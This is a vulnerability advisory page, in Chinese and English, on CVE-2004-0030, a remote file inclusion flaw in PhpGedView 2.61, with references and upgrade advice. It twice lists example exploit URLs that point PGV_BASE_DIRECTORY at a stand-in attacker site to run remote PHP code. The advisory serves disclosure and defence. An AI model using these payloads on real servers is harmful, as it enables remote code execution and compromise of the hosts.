CVE-2004-0030
CVSS7.5
发布时间 :2004-01-20 00:00:00
修订时间 :2016-10-17 22:39:56
NMCOES    

[原文]PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.


[CNNVD]PhpGedView多个PHP包含漏洞(CNNVD-200401-043)

        PHPGEDVIEW 2.61版本中的(1) functions.php, (2) authentication_index.php, 和(3) config_gedcom.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改PGV_BASE_DIRECTORY参数去引用包含代码的远程Web服务器上的URL来执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0030
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-043
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107340840209453&w=2
(UNKNOWN)  BUGTRAQ  20040106 Vuln in PHPGEDVIEW 2.61 Multi-Problem
http://www.securityfocus.com/bid/9368
(UNKNOWN)  BID  9368
http://www.securitytracker.com/id?1008632
(UNKNOWN)  SECTRACK  1008632
http://xforce.iss.net/xforce/xfdb/14159
(VENDOR_ADVISORY)  XF  phpgedview-pgvbasedirectory-file-include(14159)

- 漏洞信息

PhpGedView多个PHP包含漏洞
高危 输入验证
2004-01-20 00:00:00 2006-09-28 00:00:00
远程  
        PHPGEDVIEW 2.61版本中的(1) functions.php, (2) authentication_index.php, 和(3) config_gedcom.php存在PHP远程文件包含漏洞。远程攻击者可以通过修改PGV_BASE_DIRECTORY参数去引用包含代码的远程Web服务器上的URL来执行任意PHP代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23520)

PhpGedView 2.61 Multiple PHP Remote File Include Vulnerabilities (EDBID:23520)
php webapps
2004-01-06 Verified
0 Windak
N/A [点击下载]
source: http://www.securityfocus.com/bid/9368/info

PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.

http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker's_site]		

- 漏洞信息

3343
PhpGedView $PGV_BASE_DIRECTORY PHP File Include

- 漏洞描述

PhpGedView contains a flaw that may allow a malicious user to execute arbitrary code on the vulnerable system. The issue is triggered when an attacker uses a specially crafted URL. It is possible that the flaw may allow arbitrary code to execute resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-01-06 2004-01-06
Unknow Unknow

- 解决方案

Upgrade to version 2.65 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Note that 2.65 is currently only available as a beta release.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PhpGedView Multiple PHP Remote File Include Vulnerabilities
Input Validation Error 9368
Yes No
2004-01-06 12:00:00 2009-07-12 12:56:00
Discovery is credited to Windak.

- 受影响的程序版本

PhpGedView PhpGedView 2.61

- 漏洞讨论

PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.

- 漏洞利用

The following examples were provided:

http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker's_site]

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站